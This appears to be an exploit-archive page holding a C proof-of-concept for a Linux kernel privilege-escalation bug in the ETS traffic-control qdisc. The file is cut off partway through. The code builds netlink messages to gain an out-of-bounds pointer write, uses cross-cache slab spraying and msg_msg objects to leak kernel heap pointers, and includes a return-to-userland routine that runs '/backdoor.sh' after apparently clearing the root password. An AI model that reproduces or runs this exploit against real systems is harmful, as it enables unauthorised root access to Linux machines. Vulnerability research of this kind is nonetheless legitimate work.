4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exp_2.c C
#include <stdarg.h>
#include <time.h>
#define __USE_GNU 1
#define _GNU_SOURCE
#include <stdio.h>
#include <assert.h>
#include <string.h>
#include <fcntl.h>
#include <linux/kernel.h>
#include <linux/netlink.h>
#include <linux/sock_diag.h>
#include <sys/socket.h>
#include <linux/vm_sockets.h>
#include <sched.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/shm.h>
#include <sys/types.h>
#include <stdbool.h>
#include <errno.h>
#include <net/if.h>
#include <pthread.h>
#include <arpa/inet.h>
#include <linux/netlink.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>
#include <linux/pkt_sched.h>
#include <linux/rtnetlink.h>
#include <linux/if_alg.h>

void set_quant(uint32_t quant, int sock_fd, int idx,
               struct sockaddr_nl *dest_addr);
uint32_t get_quant(int sock_fd, int idx, struct sockaddr_nl *dest_addr,
                   int clid, int handle, int parent);
uint32_t dump_qdisc(uint64_t *kbase, uint64_t *k2kleak);
void do_ptr_write(uint32_t idx, uint32_t dst, int do_reset, int sock_to_use,
                  struct sockaddr_nl *dst_addr);
uint32_t del_qdisc(int sock_fd, int idx, struct sockaddr_nl *dest_addr,
                   int hnd);
int create_qdisc(int sock_fd, int idx, struct sockaddr_nl *dest_addr, int hnd,
                 int parent_hnd);

// for 2k
#define PARTIAL_LIST_SZ 24
#define OBJ_PER_SLAB 16
#define TOTAL_ALLOC (OBJ_PER_SLAB * (PARTIAL_LIST_SZ + 1))
#define SOCK_SZ 0x4d0
#define PRE (OBJ_PER_SLAB - 1)
#define POST (OBJ_PER_SLAB + 1)
#define GARBAGE (TOTAL_ALLOC)
#define FLUSH 0x12c

#define NLA_F_NESTED (1 << 15)

#define SOCK_SPRAY ((OBJ_PER_SLAB * PARTIAL_LIST_SZ) * 2)
#define QID1_NUM (EVICT_N + PRE + POST + 1)
#define EVICT_N (OBJ_PER_SLAB * 0x400)
#define MSGSZ 48
#define MSG_COPY 040000
#define PAGESIZE 0x1000
#define MSGMSGSZ PAGESIZE - 48
#define MSGSEGSZ PAGESIZE - 8
//  This is ruia's fault
#define MSG_SPRAY 9999

#define MAX_K2K_SZ 0x800
#define COMP_SZ_MAX (MSGMSGSZ)
#define NEWCOMPSZ (COMP_SZ_MAX + 0x100)

#define MAX_PAYLOAD 1024   /* maximum payload size*/
#define NLM_F_REQUEST 0x01 /* It is request message. 	*/
#define NLM_F_CREATE 0x400 /* Create, if it does not exist	*/
#define NLMSG_MIN_TYPE 0x10
#define TC_H_MAJ_MASK (0xFFFF0000U)

struct msg_msgseg {
  struct msg_msgseg *next;
  /* the next part of the message follows immediately */
};

struct msg_msg {
  void *lnext, *lprev;
  long m_type;
  size_t m_ts; /* message text size */
  struct msg_msgseg *next;
  void *security;
  /* the actual message follows immediately */
};

char *recv_msg(int qid, int msgsz, int copy_msg, int type) {

  char *memdmp = NULL;
  // Mysterious +0x10 for no reason
  memdmp = malloc(msgsz + 0x10);

  uint32_t flags = 0;
  if (copy_msg)
    flags |= (IPC_NOWAIT | MSG_NOERROR | MSG_COPY);
  else
    flags |= (IPC_NOWAIT | MSG_NOERROR);

  if (msgrcv(qid, memdmp, msgsz, type, flags) < 0) {
    perror("msgrcv lol");
    free(memdmp);
    exit(-1);
  }

  return memdmp;
}

// This to make it painfully obvious what we r doing
char *recv_msg_CPY(int qid, int msgsz, int copy_msg, int type) {
  return recv_msg(qid, msgsz, 1, type);
}
void dumph(unsigned char *data, uint32_t len, char sep) {
  for (int i = 0; i < len; i++) {

    if (data[i] < 0x10)
      printf("0");

    printf("%hhx%c", data[i], sep);

    if (i % 16 == 0)
      printf("\n");
  }
  printf("\n");
}

// https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-5345_lts_mitigation/exploit/lts-6.1.52/exploit.c
bool write_to_file(const char *path, const char *data_fmt, ...) {
  char *buf = NULL;
  va_list args;
  va_start(args, data_fmt);
  if (vasprintf(&buf, data_fmt, args) < 0) {
    perror("vasprintf");
    return false;
  }

  va_end(args);
  int fd = open(path, O_WRONLY);
  if (fd < 0) {
    fprintf(stderr, "open %s for writing: %s\n", path, strerror(errno));
    free(buf);
    return false;
  }

  write(fd, buf, strlen(buf));
  close(fd);
  free(buf);
  return true;
}
bool setup_namespace(void) {
  int real_uid = getuid();
  int real_gid = getgid();

  if (unshare(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET) < 0) {
    perror("unshare(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWIPC)");
    return false;
  }

  if (!write_to_file("/proc/self/setgroups", "deny"))
    return false;

  if (!write_to_file("/proc/self/uid_map", "0 %d 1\n", real_uid))
    return false;

  if (!write_to_file("/proc/self/gid_map", "0 %d 1\n", real_gid))
    return false;

  return true;
}

// Back to my stuff - old code that aint needed.
// int make_net_ns() {
//  int ns_fd = 0;
//
//  if (unshare(CLONE_NEWNET) < 0) {
//    perror("unshare");
//    exit(-1);
//  }
//  return ns_fd;
//}

int msg_spray_nodiag(int msgsz, char *msgtxt, int spray_n, int *qstore) {

  int ret = -1, qid;
  socklen_t len = 0;
  socklen_t lens[spray_n];
  char mbuf[msgsz];
  // struct msgbuf *msg = malloc(msgsz);
  struct msgbuf *msg = (struct msgbuf *)mbuf;
  msgsz -= (MSGSZ);
  memset(msg->mtext, 0, msgsz);
  memcpy(msg->mtext, msgtxt, msgsz);
  for (int i = 0; i < spray_n; i++) {
    msg->mtype = i + 1;
    qid = qstore[i];
    if (msgsnd(qid, msg, msgsz, 0) < 0) {
      perror("msgsnd lol");
      ret = -1;
      exit(-1);
    }
  }
  return ret;
}

int send_msg(int qid, int msgsz, char *msgtxt, int type) {

  int ret = 0;
  //  Subtract the size of a given msg_msg struct. We assume the size of the
  //  struct will be included in the size i guess??? I guess it means we wont be
  //  making as many mistakes with the sizes then lol.
  struct msgbuf *msg = malloc(msgsz);
  msgsz -= (MSGSZ);
  memset(&msg->mtext, 0, msgsz);

  // Has to be non-negative, but is not used by the send logic, so i just
  // initialise to 0.
  msg->mtype = type;
  memcpy(msg->mtext, msgtxt, msgsz);

  if (msgsnd(qid, msg, msgsz, IPC_NOWAIT) < 0) {
    perror("msgsnd lol");
    ret = -1;
    exit(-1);
  }

  free(msg);
  return ret;
}

// Taken from hoefler's sploit.
// Needed so we can guarantee our allocation stuff for cross cache happens in
// the same cpu kernel thread and stuff. Specifically when we have pages
// returned to the percpu page freelist we want it accessible on our current
// cpu. See https://haehyun.github.io/papers/playing-for-keaps-22-sec.pdf.
void pin_cpu(int cpu) {
  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(cpu, &set);
  if (sched_setaffinity(0, sizeof(set), &set) == -1) {
    perror("sched_setaffinity");
    exit(1);
  }
}

// Old func used for pausing and stuff
void waitp(char *prompt) {
  puts(prompt);
  while ((getchar() != 'X')) {
    continue;
  }
}

// Binding and init
int setup_rtnet(struct sockaddr_nl *src_addr, struct sockaddr_nl *dest_addr) {

  int sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  if (sock_fd < 0) {
    return -1;
  }

  memset(src_addr, 0, sizeof(*src_addr));
  src_addr->nl_family = AF_NETLINK;
  src_addr->nl_pid = getpid(); /* self pid */

  if (bind(sock_fd, (struct sockaddr *)src_addr, sizeof(*src_addr)) < 0) {
    perror("setup_rtnet bind");
    exit(-1);
  }

  memset(dest_addr, 0, sizeof(*dest_addr));
  dest_addr->nl_family = AF_NETLINK;
  dest_addr->nl_pid = 0;    /* For Linux Kernel */
  dest_addr->nl_groups = 0; /* unicast */
  return sock_fd;
}

// Idk why this is in its own function, but it gonna stay this way now.
int do_cross_cache_qdisc(uint32_t *quant, int idx) {

  // How do we ensure that we have several "clean" cache boundaries?
  // ANS: We need some "fluff" objects which guarantee that our socket lands in
  // a slab we have complete control over. We have pre allocations to pad it
  // into the slab, and post allocations which ensure we control the rest of the
  // slab.
  int sockets[TOTAL_ALLOC] = {0};
  uint64_t top = 0xffff8880;
  top <<= 32;
  int junk[TOTAL_ALLOC] = {0};
  int socks_alloc_new_slab[OBJ_PER_SLAB + 1] = {0};
  int socks_victim_slab[OBJ_PER_SLAB] = {0};
  struct sockaddr_nl src_addr, dest_addr;
  struct sockaddr_nl src_addr1, dest_addr1;
  int ret = 0;

  // Alloc and subsequently release our qdisc
  // const char *cmd = "tc qdisc add dev lo root handle 1: ets bands 8 "
  //                  "priomap 7 6 5 4 3 2 1 0; ip link set dev lo up";

  int sock_fd = setup_rtnet(&src_addr, &dest_addr);
  //  This pre-allocation will be enough to get a new slab which we entirely
  //  control
  //
  //  Im using PF_NETLINK as its allocated in normal kmalloc-2k, whereas others
  //  are not. Just the first kind i found that was.
  for (int i = 0; i < TOTAL_ALLOC; i++) {
    junk[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  }

  struct sockaddr_vm addr = {0};

  // Step 1: Alloc target object with pre and post allocations

  int pre_post[PRE + POST] = {0};

  for (int i = 0; i < PRE; i++) {
    pre_post[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  }

  //  Allocate our qdisc here
  create_qdisc(sock_fd, idx, &dest_addr, 1, TC_H_ROOT);
  system("ip link set dev lo up");
  sleep(1);
  // We need to leak stuff here
  *quant = get_quant(sock_fd, idx, &dest_addr, 0, 0, TC_H_ROOT);
  printf("0x%lx\n", top | (*quant - 0x180));

  //   As well as padding out the rest of the allocation, this also serves the
  //   purpose of setting a new active slab.
  for (int i = PRE; i < PRE + POST; i++) {
    pre_post[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  }

  //  The qdisc free takes a lil bit from what ive observed
  del_qdisc(sock_fd, idx, &dest_addr, 1);
  sleep(10);
  // sleep(6);
  puts("get new slab");

  // Free other sockets in victime slab
  // Adds our slab to partial list. This is the last time out object gets freed.
  puts("deplete victim slab");

  // Free one obj per slab to overflow partial list
  for (int i = 0; i < TOTAL_ALLOC; i += OBJ_PER_SLAB) {
    close(junk[i]);
  }

  for (int i = 0; i < PRE + POST; i++) {
    close(pre_post[i]);
  }

  // wait("ovf partial list");
  for (int i = 0; i < TOTAL_ALLOC; i++) {
    close(junk[i]);
  }
  //  At this point we shouldve freed the page. Indeed, this works INSIDE QEMU.
  //  Most of the time - i believe - we will need padding to have a chance of
  //  this actually working tho. Now we can spray the target object and reclaim
  //  the page. A socket is about 0x4c0
  //
  close(sock_fd);
  // This sleep improves reliability massively
  sleep(3);
  return 0;
}

// Use the oob access to SET the quant value, OR in our case the prev ptr of the
// active list on the sch.
void set_quant(uint32_t quant, int sock_fd, int idx,
               struct sockaddr_nl *dest_addr) {
  struct nlmsghdr *nlh = NULL;
  struct iovec iov;
  struct msghdr msg;
  memset(&msg, 0, sizeof(msg));
  nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
  memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
  nlh->nlmsg_len = NLMSG_SPACE(MAX_PAYLOAD);
  nlh->nlmsg_pid = getpid();
  nlh->nlmsg_type = RTM_NEWTCLASS;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_ECHO;
  struct tcmsg tc;
  memset(&tc, 0, sizeof(tc));
  char buf[0x1000] = {0};
  struct nlattr *attr = (struct nlattr *)buf;
  memset(attr, 0, sizeof(*attr));
  attr->nla_type = TCA_OPTIONS | NLA_F_NESTED;
  attr->nla_len = NLA_HDRLEN * 3;
  uint32_t clid = 0x0;
  // Handle is formatted with qdisc id at start, 1 *should* be root qdisc.
  tc.tcm_handle = (0x1 << 16) | clid;
  tc.tcm_parent = TC_H_ROOT;
  tc.tcm_ifindex = idx;
  memcpy(NLMSG_DATA(nlh), &tc, sizeof(tc));
  // Copy in our attrs
  memcpy(NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(tc)), attr, sizeof(*attr));
  attr->nla_type = TCA_ETS_QUANTA_BAND;
  attr->nla_len = NLA_HDRLEN * 2;
  memcpy(&buf[sizeof(*attr)], &quant, sizeof(quant));
  memcpy(NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(tc)) + sizeof(*attr), attr,
         sizeof(*attr) + sizeof(uint32_t));

  iov.iov_base = (void *)nlh;
  iov.iov_len = nlh->nlmsg_len;
  msg.msg_name = (void *)dest_addr;
  msg.msg_namelen = sizeof(*dest_addr);
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;

  printf("Sending message to kernel\n");
  if (sendmsg(sock_fd, &msg, 0) < 0) {
    perror("set_quant sendmsg");
    exit(-1);
  }
  free(nlh);
}

uint32_t get_quant(int sock_fd, int idx, struct sockaddr_nl *dest_addr,
                   int clid, int handle, int parent) {
  int quant = 0x41414141;
  struct nlmsghdr *nlh = NULL;
  struct iovec iov = {0};
  struct msghdr msg = {0};

  nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
  memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
  nlh->nlmsg_len = NLMSG_SPACE(MAX_PAYLOAD);
  nlh->nlmsg_pid = getpid();
  nlh->nlmsg_type = RTM_NEWTCLASS;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_ECHO;
  struct tcmsg tc;
  memset(&tc, 0, sizeof(tc));
  char buf[0x1000] = {0};
  struct nlattr *attr = (struct nlattr *)buf;
  memset(attr, 0, sizeof(*attr));
  attr->nla_type = TCA_OPTIONS | NLA_F_NESTED;
  // Truncated so we can avoid setting quant value for the class
  attr->nla_len = NLA_HDRLEN * 1;
  if (!clid)
    clid = 0x41;
  if (!handle)
    handle = 1;
  // Handle is formatted with qdisc id at start, 1 *should* be root qdisc.
  tc.tcm_handle = (handle << 16) | clid;
  tc.tcm_parent = parent;
  tc.tcm_ifindex = idx;
  // g_parent = TC_H_ROOT;
  memcpy(NLMSG_DATA(nlh), &tc, sizeof(tc));
  // Copy in our attrs
  memcpy(NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(tc)), attr, sizeof(*attr));
  attr->nla_type = TCA_ETS_UNSPEC;
  attr->nla_len = NLA_HDRLEN * 1;
  memcpy(&buf[sizeof(*attr)], &quant, sizeof(quant));
  memcpy(NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(tc)) + sizeof(*attr), attr,
         sizeof(*attr) + sizeof(uint32_t));

  iov.iov_base = (void *)nlh;
  iov.iov_len = nlh->nlmsg_len;
  msg.msg_name = (void *)dest_addr;
  msg.msg_namelen = sizeof(*dest_addr);
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;

  printf("Sending message to kernel\n");
  if (sendmsg(sock_fd, &msg, 0) < 0) {
    perror("get_quant recvmsg");
    exit(-1);
  }

  iov.iov_base = (void *)nlh;
  iov.iov_len = nlh->nlmsg_len;
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;
  msg.msg_name = (void *)dest_addr;
  msg.msg_namelen = sizeof(*dest_addr);

  if (recvmsg(sock_fd, &msg, 0) < 0) {
    perror("get_quant recvmsg");
    exit(-1);
  }
  printf("Received message payload: %s\n", NLMSG_DATA(nlh));

  int qval = *(int *)(&((char *)msg.msg_iov->iov_base)[48 + 4]);

  printf("Quant: 0x%x\n", qval);

  dumph(&((char *)msg.msg_iov->iov_base)[0], 0x60, ' ');

  free(nlh);
  return qval;
}

uint32_t del_qdisc(int sock_fd, int idx, struct sockaddr_nl *dest_addr,
                   int hnd) {
  struct nlmsghdr *nlh = NULL;
  struct iovec iov = {0};
  struct msghdr msg = {0};
  char buf[1024] = {0};

  struct sockaddr_nl dest_addr_loc = {0};
  struct sockaddr_nl src_addr_loc = {0};

  int oursock = 0;
  if (!sock_fd) {
    oursock = 1;
    // this doesnt work u need to set up rtnetlink
    dest_addr = &dest_addr_loc;
    sock_fd = setup_rtnet(&src_addr_loc, dest_addr);
  }

  struct tcmsg tc = {0};
  nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
  memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
  nlh->nlmsg_len = NLMSG_LENGTH(sizeof(tc));
  nlh->nlmsg_pid = getpid();
  nlh->nlmsg_type = RTM_DELQDISC;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
  nlh->nlmsg_seq = 1;
  memset(&tc, 0, sizeof(tc));

  // Handle is formatted with qdisc id at start, 1 *should* be root qdisc.
  tc.tcm_handle = (hnd << 16) | 0;
  tc.tcm_parent = TC_H_ROOT;
  tc.tcm_ifindex = idx;
  memcpy(NLMSG_DATA(nlh), &tc, sizeof(tc));

  iov.iov_base = (void *)nlh;
  iov.iov_len = nlh->nlmsg_len;
  msg.msg_name = (void *)dest_addr;
  msg.msg_namelen = sizeof(*dest_addr);
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;

  printf("Sending message to kernel\n");
  if (sendmsg(sock_fd, &msg, 0) < 0) {
    perror("sendmsg");
    exit(-1);
  }
  printf("Waiting for message from kernel\n");

  iov.iov_base = buf;
  iov.iov_len = sizeof(buf);
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;
  msg.msg_name = (void *)dest_addr;
  msg.msg_namelen = sizeof(*dest_addr);

  if (recvmsg(sock_fd, &msg, 0) < 0) {
    perror("recvmsg");
    exit(-1);
  }
  printf("Received message payload: %s\n", NLMSG_DATA(nlh));

  dumph(&((char *)msg.msg_iov->iov_base)[0], 0x10, ' ');

  if (oursock)
    close(sock_fd);

  free(nlh);
  // Gotta remember that we do reset the handle val
  return 0;
}
int create_qdisc(int sock_fd, int idx, struct sockaddr_nl *dest_addr, int hnd,
                 int parent_hnd) {
  struct nlmsghdr *nlh = NULL;
  struct iovec iov;
  struct msghdr msg;
  uint16_t totlen = 0;

  memset(&msg, 0, sizeof(msg));
  nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
  memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
  nlh->nlmsg_len = NLMSG_SPACE(MAX_PAYLOAD);
  // nlh->nlmsg_len = sizeof(struct nlmsghdr) - 1;
  nlh->nlmsg_pid = getpid();
  nlh->nlmsg_type = RTM_NEWQDISC;
  // Somehow removing NLM_F_ECHO fixes leaks somewhat.
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; // | NLM_F_ECHO;
  struct tcmsg tc;
  memset(&tc, 0, sizeof(tc));
  // Handle is formatted with qdisc id at start, 1 *should* be root qdisc.
  uint32_t clid = 0x0;
  tc.tcm_family = TCA_UNSPEC;
  tc.tcm_handle = (hnd << 16) | clid;
  tc.tcm_parent = parent_hnd;
  tc.tcm_ifindex = idx;
  // g_parent = TC_H_ROOT;
  memcpy(NLMSG_DATA(nlh), &tc, sizeof(tc));

  char buf[0x300] = {0};
  struct nlattr *attr = (struct nlattr *)buf;
  attr->nla_type = TCA_KIND;
  attr->nla_len = NLA_HDRLEN + 3;
  strcpy(&attr[1], "ets");
  attr = (struct nlattr *)((uint8_t *)(attr) + NLA_ALIGN(attr->nla_len));
  attr->nla_type = TCA_OPTIONS | NLA_F_NESTED;
  // Will be filled in later
  attr->nla_len = -1;
  struct nlattr *options = attr;
  attr = &attr[1];

  // Copy in our attrs
  attr->nla_type = TCA_ETS_NBANDS;
  attr->nla_len = NLA_HDRLEN + 1;
  *(uint8_t *)(&attr[1]) = 8;
  totlen += NLA_ALIGN(sizeof(*attr) + attr->nla_len);
  attr = (struct nlattr *)((uint8_t *)(attr) + NLA_ALIGN(attr->nla_len));

  attr->nla_type = TCA_ETS_PRIOMAP | NLA_F_NESTED;
  attr->nla_len = NLA_HDRLEN;
  struct nlattr *priomap = attr;
  attr = &attr[1];

  int start_band = 7;
  while (start_band >= 0) {
    attr->nla_type = TCA_ETS_PRIOMAP_BAND;
    attr->nla_len = NLA_HDRLEN + 1;
    *(uint8_t *)(&attr[1]) = start_band;
    priomap->nla_len += NLA_ALIGN(attr->nla_len);
    attr = (struct nlattr *)((uint8_t *)(attr) + NLA_ALIGN(attr->nla_len));
    start_band--;
  }
  totlen += NLA_ALIGN(priomap->nla_len);
  options->nla_len = NLA_ALIGN(totlen);
  memcpy(NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(tc)), buf, sizeof(buf));
  iov.iov_base = (void *)nlh;
  iov.iov_len = nlh->nlmsg_len;
  msg.msg_name = (void *)dest_addr;
  msg.msg_namelen = sizeof(*dest_addr);
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;

  printf("Sending message to kernel\n");
  if (sendmsg(sock_fd, &msg, 0) < 0) {
    perror("create_qdisc sendmsg");
    exit(-1);
  }
  free(nlh);

  return 0;
}

// https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/kpti_with_trampoline.c
unsigned long user_cs, user_ss, user_rflags, user_sp;

void save_state() {
  __asm__(".intel_syntax noprefix;"
          "mov user_cs, cs;"
          "mov user_ss, ss;"
          "mov user_sp, rsp;"
          "pushf;"
          "pop user_rflags;"
          ".att_syntax;");
  puts("[*] Saved state");
}

void retfunc() {
  puts("Back in usermode yayyy");

  // https://theori.io/blog/reviving-the-modprobe-path-technique-overcoming-search-binary-handler-patch
  struct sockaddr_alg sa;
  int alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
  if (alg_fd < 0) {
    perror("socket(AF_ALG) failed");
    exit(-1);
  }

  memset(&sa, 0, sizeof(sa));
  sa.salg_family = AF_ALG;
  // Thx theorio
  strcpy((char *)sa.salg_type, "V4bel"); // dummy string
  bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));

  // Should've deleted the root password atp so we gud
  system("/backdoor.sh");
  exit(0);
}
// Just send a packet to localhost
void trigger_write() {
  int s = socket(AF_INET, SOCK_DGRAM, 0);
  struct sockaddr_in saddr = {0};
  saddr.sin_family = AF_INET;
  saddr.sin_port = 1234;
  inet_pton(AF_INET, "127.0.0.1", &saddr.sin_addr);
  sendto(s, "lol", 3, 0, &saddr, sizeof(saddr));
  close(s);
}

// Write the ptr somewhere in slabs
int sock_to_use = 0;
struct sockaddr_nl *dst_addr_glb = NULL;
void do_ptr_write(uint32_t idx, uint32_t dst, int do_reset, int sock_to_use,
                  struct sockaddr_nl *dst_addr) {
  int ret;
  struct sockaddr_nl sdst = {0};
  struct sockaddr_nl src_addr, *dest_addr = &sdst;
  int sock_fd = 0;
  if (!sock_to_use) {
    sock_fd = setup_rtnet(&src_addr, dest_addr);
    if (sock_fd < 0) {
      perror("ptr write setup_rtnet");
      exit(-1);
    }
  } else {
    sock_fd = sock_to_use;
    dest_addr = dst_addr_glb;
  }

  set_quant(dst, sock_fd, idx, dest_addr);

  if (!sock_to_use)
    close(sock_fd);
  sock_to_use = 0;
  dst_addr_glb = NULL;

  trigger_write();

  if (do_reset) {
    ret = system("ip link set dev lo down");
    ret = system("ip link set dev lo up");
  }
}

void make_slabs(int *msgq, int *pre_post, uint32_t num_alloc, uint32_t pre,
                uint32_t post) {
  // Make a bunch of 2k slabs for us to release later, hopefully will enable us
  // to release our qdisc slab from the percpu freelist Because the target is
  // also order-3, we must also release order 3. We should ideally call this
  // func BEFORE anything else in the program.

  // msg_spray_nodiag(int msgsz, char *msgtxt, int spray_n, int *qstore)
  char mtext[MAX_K2K_SZ];
  memset(mtext, 0x88, MAX_K2K_SZ);
  msg_spray_nodiag(MAX_K2K_SZ, mtext, PRE, pre_post);

  msg_spray_nodiag(MAX_K2K_SZ, mtext, num_alloc, msgq);
  msg_spray_nodiag(MAX_K2K_SZ, mtext, POST, &pre_post[PRE]);
}
void release_slabs(int *msgq, int *pre_post, uint32_t num_alloc, uint32_t pre,
                   uint32_t post) {
  // Does the inverse of the above.
  // Free one obj per slab to overflow partial list
  char *mrecv = NULL;
  for (int i = 0; i < num_alloc; i += OBJ_PER_SLAB) {
    mrecv = recv_msg(msgq[i], MAX_K2K_SZ, 0, 0);
    free(mrecv);
  }

  for (int i = 0; i < pre + post; i++) {
    mrecv = recv_msg(pre_post[i], MAX_K2K_SZ, 0, 0);
    free(mrecv);
  }

  for (int i = 0; i < num_alloc; i++) {
    if (!(i % OBJ_PER_SLAB))
      continue;
    mrecv = recv_msg(msgq[i], MAX_K2K_SZ, 0, 0);
    free(mrecv);
  }
}

void do_exp() {
  pin_cpu(0);

  // Make the 2k slabs we will use later to evict
  int evict_slabs[EVICT_N] = {0};
  int *evict_slabs_p = NULL;
  int ev_pre_post[PRE + POST] = {0};
  int *ev_pre_post_ptr = NULL;

  int qid[MSG_SPRAY] = {};
  for (int i = 0; i < MSG_SPRAY; i++) {
    qid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
    if (qid[i] < 0) {
      perror("msgget init");
      exit(-1);
    }
  }
  // Need to make sure this is more than MSG_SPRAY*2 lol.
  int qid1[MSG_SPRAY * 2] = {};
  for (int i = 0; i < MSG_SPRAY * 2; i++) {
    qid1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
    // qid[i] = msgget(i, IPC_CREAT | 0666);
    if (qid1[i] < 0) {
      perror("msgget init");
      exit(-1);
    }
  }
  evict_slabs_p = qid1;
  ev_pre_post_ptr = &evict_slabs_p[EVICT_N];
  make_slabs(evict_slabs_p, ev_pre_post_ptr, EVICT_N, PRE, POST);

  uint64_t leak = 0;
  int sock_fd = 0;

  uint64_t kbase = 0;
  uint64_t k2kleak = 0;
  // First im gonna spray a whole bunch of netlink socks
  // Hopefully this makes leaks a bit more consistent
  struct sockaddr_nl src_addr, dest_addr;
  struct nlmsghdr *nlh = NULL;
  struct iovec iov;
  int ret = 0; // system(cmd);

  int idx = if_nametoindex("lo");
  if (!idx) {
    perror("if_nametoindex ");
  }
  printf("[!] lo idx: %d\n", idx);

  uint32_t quant = 0;
  uint32_t tmp = quant;

  //  Should allocate enought space for the socket struct
  //  For our msgmsg sploitation
  char msg[COMP_SZ_MAX] = {0};

  // For testing quant leaks
  uint64_t top = 0xffff8880;

  // Old commands, now we have functions that do most of this.
  // const char *cmd = "tc qdisc add dev lo root handle 1: ets bands 9 "
  //                   "priomap 7 6 5 4 3 2 1 4 7; ip link set dev lo up";
  // const char *cmd1 = "tc qdisc add dev lo parent 1:1 handle 2: ets bands 9 "
  //                    "priomap 7 6 5 4 3 2 1 4 7;";
  // const char *rm_cmd =
  //     "tc qdisc delete lo parent 1 handle 2; ip link set dev lo down";

  // We want to free our qdisc, so that when we reclaim the slab during cross
  // cache we may get the same area as msg_msg. Meaning our leak is somewhat
  // reliable (gosh i know).

  memset(msg, '\x41', COMP_SZ_MAX);

  //  Now cross cache and spray msg
  do_cross_cache_qdisc(&quant, idx);

  ret = msg_spray_nodiag(COMP_SZ_MAX, msg, MSG_SPRAY / 2, qid);

  sock_fd = setup_rtnet(&src_addr, &dest_addr);
  // Spray some sockets here.......
  int junk[TOTAL_ALLOC] = {0};
  for (int i = 0; i < TOTAL_ALLOC; i++) {
    junk[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  }

  struct sockaddr_vm addr = {0};

  // Step 1: Alloc target object with pre and post allocations

  int pre_post[PRE + POST] = {0};

  for (int i = 0; i < PRE; i++) {
    pre_post[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  }

  printf("[*] Making another qdisc...\n");
  //  Allocate our qdisc here

  create_qdisc(sock_fd, idx, &dest_addr, 1, TC_H_ROOT);
  system("ip link set dev lo up");
  sleep(1);
  // We need to leak stuff here

  //   As well as padding out the rest of the allocation, this also serves the
  //   purpose of setting a new active slab.
  for (int i = PRE; i < PRE + POST; i++) {
    pre_post[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  }

  if (quant & 0xf00) {
    quant &= (~0xfff);
    quant += 0x180;
  }

  uint32_t msg_dst = quant - 0x180 + 0x30;

  do_ptr_write(idx, msg_dst, 1, sock_fd, &dest_addr);

  // Write can be used multiple times as long as we turn on and off the qdisc
  // to empty the class packet queue, otherwise we cant enter the code inside
  // ets_qdisc_enqueue that writes the ptr.

  char *mrecv;
  uint64_t qdisc_ptr_leak = 0;
  int i = 0;

  memset(msg, '\xff', COMP_SZ_MAX);
  for (i = 0; i < MSG_SPRAY / 2; i++) {
    // Release and immediately reclaim the messages we are sending.
    // This means when we break we free the correct msg and can then
    // just grab it and do whatever we want with it being free.
    mrecv = recv_msg(qid[i], COMP_SZ_MAX, 0, 0);
    if (mrecv[8 + 1] != '\x41') {
      printf("[!] Found: %d....\n", i);
      dumph(mrecv + 8, 0x8, ' ');
      qdisc_ptr_leak = *(uint64_t *)(&mrecv[8]);
      break;
    }
    send_msg(qid[i], COMP_SZ_MAX, msg, i + 1);
    free(mrecv);
  }

  if (!qdisc_ptr_leak) {
    // We will likely just crash here regardless lol
    printf("[!] Cross cache failed lol. Retry\n");
    return;
  }
  free(mrecv);

  char msg1[NEWCOMPSZ];
  memset(msg1, '\x43', NEWCOMPSZ);
  send_msg(qid[i], NEWCOMPSZ, msg1, i);

  printf("[*] Qdisc full heap ptr leak: %p\n", (void *)qdisc_ptr_leak);

  //  Now we need even MOAR leaks i think. Should done this before probably.
  //  Hit the next ptr -- hopefully. This also smashes the type, so we need to
  //  kinda fill in the gaps
  do_ptr_write(idx, quant - 0x180 + 0x20, 1, sock_fd, &dest_addr);

  // Now if we release the qdisc we will have a dangling ptr left in the next
  // seg ptr
  // int spray_socks_corruptable[0x200];
  int spray_socks_corruptable[0x150];

  for (int i = 0;
       i < sizeof(spray_socks_corruptable) / sizeof(spray_socks_corruptable[0]);
       i++) {
    //  No worky, need better objects
